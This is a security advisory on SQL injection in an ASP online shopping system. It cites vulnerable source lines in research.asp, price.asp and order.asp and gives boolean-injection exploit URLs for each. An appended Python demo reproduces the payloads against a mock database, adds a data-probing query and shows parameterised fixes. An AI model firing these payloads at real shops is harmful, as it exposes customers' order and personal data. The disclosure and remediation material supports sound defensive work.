Version: Wangqu Online Shopping System, flagship edition (free version)
Download: http://www.cnhww.com/down.asp?id=6
----------------------------------------------------------------------
First:
/research.asp
selectname is not filtered, which leads to a search-type (LIKE) injection. (searchkey, jiage and anclassid are concatenated into the same statement without filtering either.)
Code:
Lines 7-12:
dim action,searchkey,anclassid,jiage,selectname
anclassid=request("anclassid")
searchkey=request("searchkey")
jiage=request("jiage")
action=request("action")
selectname=request("selectname")  ' selectname is read here; nothing between here and line 212 filters it
Lines 212-230:
if anclassid<>0 then
select case action
case "1"
sql1="bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&""
case "2"
sql1="pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&""
case "3"
sql1="bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&""
end select
else
select case action
case "1"
sql1="bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&")"
case "2"
sql1="pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&")"  ' this is the branch used by the exploit below
case "3"
sql1="bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&")"
end select
end if
Line 234:
rs.open "select * from products where "&sql1&" and zhuangtai=0 order by adddate desc",conn,1,1
Exploit:
http://www.2cto.com/research.asp?anclassid=0&action=2&jiage=100000&selectname=Beijing run%' and 1=1 and '%'='
The %' in the payload closes the LIKE pattern, and the trailing and '%'=' absorbs the %' that the template appends, so the statement stays syntactically valid; compare the page returned for 1=1 with the one returned for 1=2.
--------------------------------------------------------------------
Second:
/price.asp
anid is not filtered, which leads to a numeric injection (the value is concatenated without quotes, so the payload needs no quote).
Code:
Line 74:
anid=trim(request("anid"))  ' anid is read here; nothing between here and line 104 filters it
Line 104:
if anid<>"" then
rs.open "select * from products where anclassid="&anid&" order by adddate desc",conn,1,1
Exploit:
http://<host>:8080/price.asp?anid=62 and 1=1
---------------------------------------------------------------------
Third:
/order.asp
dan is not filtered, which leads to a string-type injection. (The username taken from the Cnhww cookie is concatenated into the same statement the same way.)
Code:
Line 64:
dingdan=request.querystring("dan")  ' dan is read here; nothing between here and line 66 filters it
Line 66:
rs.open "select products.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liuyan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodizhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid where orders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"'",conn,1,1
Exploit:
Place an order first; the WHERE clause also matches orders.username against the username in the Cnhww cookie, so the injection cannot be exploited without an order of your own.
http://127.0.0.1:8080/order.asp?dan=201277143453' and '1'='1
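As an added example (not code from this advisory or from the Wangqu product), the following Python script reproduces the three concatenated queries from research.asp, price.asp and order.asp against an in-memory SQLite database with constructed data, runs the payloads quoted above, and shows parameter-bound versions of the same queries that do not react to them. It goes one step beyond the page with a boolean probe against the orders table, which is the same true/false oracle used for inference. The table contents, the brand name BrandX, the user alice, the order numbers and the wildcard escaping are assumptions for the demonstration.

```python
import sqlite3

# Constructed sample rows standing in for the shop's products and orders tables.
# Column names follow the queries quoted in the advisory; the data is invented.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(bookid INTEGER, bookname TEXT, pingpai TEXT,
            shichangjia INTEGER, huiyuanjia INTEGER, vipjia INTEGER,
            anclassid INTEGER, zhuangtai INTEGER, adddate TEXT);
        CREATE TABLE orders(bookid INTEGER, username TEXT, dingdan TEXT);
        INSERT INTO products VALUES (1, 'Book A', 'BrandX', 50, 45, 40, 62, 0, '2012-07-01');
        INSERT INTO products VALUES (2, 'Book B', 'BrandY', 80, 70, 60, 63, 0, '2012-07-02');
        INSERT INTO products VALUES (3, 'Book C', 'BrandX', 10,  9,  8, 62, 1, '2012-07-03');
        INSERT INTO orders VALUES (1, 'alice', '201277143453');
        INSERT INTO orders VALUES (2, 'bob',   '201277999999');
    """)
    return conn

# Vulnerable builders: the same concatenation as research.asp (action=2 with
# anclassid=0), price.asp and order.asp, with the non-exploited columns trimmed.
def research_sql(selectname, jiage):
    return ("select * from products where pingpai like '%" + selectname + "%' and "
            "(shichangjia<" + jiage + " or huiyuanjia<" + jiage + " or vipjia<" + jiage + ")"
            " and zhuangtai=0 order by adddate desc")

def price_sql(anid):
    return "select * from products where anclassid=" + anid + " order by adddate desc"

def order_sql(cookie_username, dan):
    return ("select products.bookid, orders.dingdan from products inner join orders "
            "on products.bookid=orders.bookid where orders.username='" + cookie_username +
            "' and dingdan='" + dan + "'")

def rows(conn, sql, params=()):
    return conn.execute(sql, params).fetchall()

# Hardened builders: bound parameters instead of concatenation. The numeric
# inputs are converted before use (the VBScript equivalent would be CLng), and
# LIKE wildcards inside the user value are escaped so an attacker's '%' is literal.
def research_rows_safe(conn, selectname, jiage):
    price = int(jiage)
    pattern = "%" + (selectname.replace("\\", "\\\\")
                     .replace("%", "\\%").replace("_", "\\_")) + "%"
    sql = ("select * from products where pingpai like ? escape '\\' and "
           "(shichangjia<? or huiyuanjia<? or vipjia<?) and zhuangtai=0 "
           "order by adddate desc")
    return rows(conn, sql, (pattern, price, price, price))

def price_rows_safe(conn, anid):
    return rows(conn, "select * from products where anclassid=? order by adddate desc",
                (int(anid),))

def order_rows_safe(conn, cookie_username, dan):
    sql = ("select products.bookid, orders.dingdan from products inner join orders "
           "on products.bookid=orders.bookid where orders.username=? and dingdan=?")
    return rows(conn, sql, (cookie_username, dan))

def demo():
    """Run each payload against the vulnerable and hardened builders; return row counts."""
    conn = make_db()
    out = {}
    # research.asp: "%'" closes the LIKE literal, and the trailing "and '%'='"
    # absorbs the "%'" the template appends, so the statement stays well-formed.
    true_p = "BrandX%' and 1=1 and '%'='"
    false_p = "BrandX%' and 1=2 and '%'='"
    out["research_true"] = len(rows(conn, research_sql(true_p, "100000")))
    out["research_false"] = len(rows(conn, research_sql(false_p, "100000")))
    # The same true/false oracle answers questions about other tables.
    probe = "BrandX%' and (select count(*) from orders)>1 and '%'='"
    out["research_probe"] = len(rows(conn, research_sql(probe, "100000")))
    out["research_safe"] = len(research_rows_safe(conn, true_p, "100000"))
    # price.asp: numeric context, no quote needed in the payload.
    out["price_true"] = len(rows(conn, price_sql("62 and 1=1")))
    out["price_false"] = len(rows(conn, price_sql("62 and 1=2")))
    try:
        price_rows_safe(conn, "62 and 1=1")
        out["price_safe_rejected"] = False
    except ValueError:
        out["price_safe_rejected"] = True
    # order.asp: string context; the WHERE also pins orders.username to the
    # cookie user, so the attacker needs an order of their own (alice here).
    out["order_true"] = len(rows(conn, order_sql("alice", "201277143453' and '1'='1")))
    out["order_false"] = len(rows(conn, order_sql("alice", "201277143453' and '1'='2")))
    out["order_safe"] = len(order_rows_safe(conn, "alice", "201277143453' and '1'='1"))
    return out

if __name__ == "__main__":
    for name, count in demo().items():
        print(name, count)
```

In classic ASP the equivalent of the bound parameters is an ADODB.Command whose Parameters collection is filled with CreateParameter, instead of building the string handed to rs.open, together with CLng or IsNumeric checks on anid and jiage before they are used. Note that a bound parameter alone does not neutralise % and _ inside a LIKE value; that is why the pattern is escaped as well.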
----------------------------------------------------------------------
Fourth:
/my_msg.asp
delid is not filtered (I use the free version and cannot test it, but this vulnerability very likely exists).
----------------------------------------------------------------------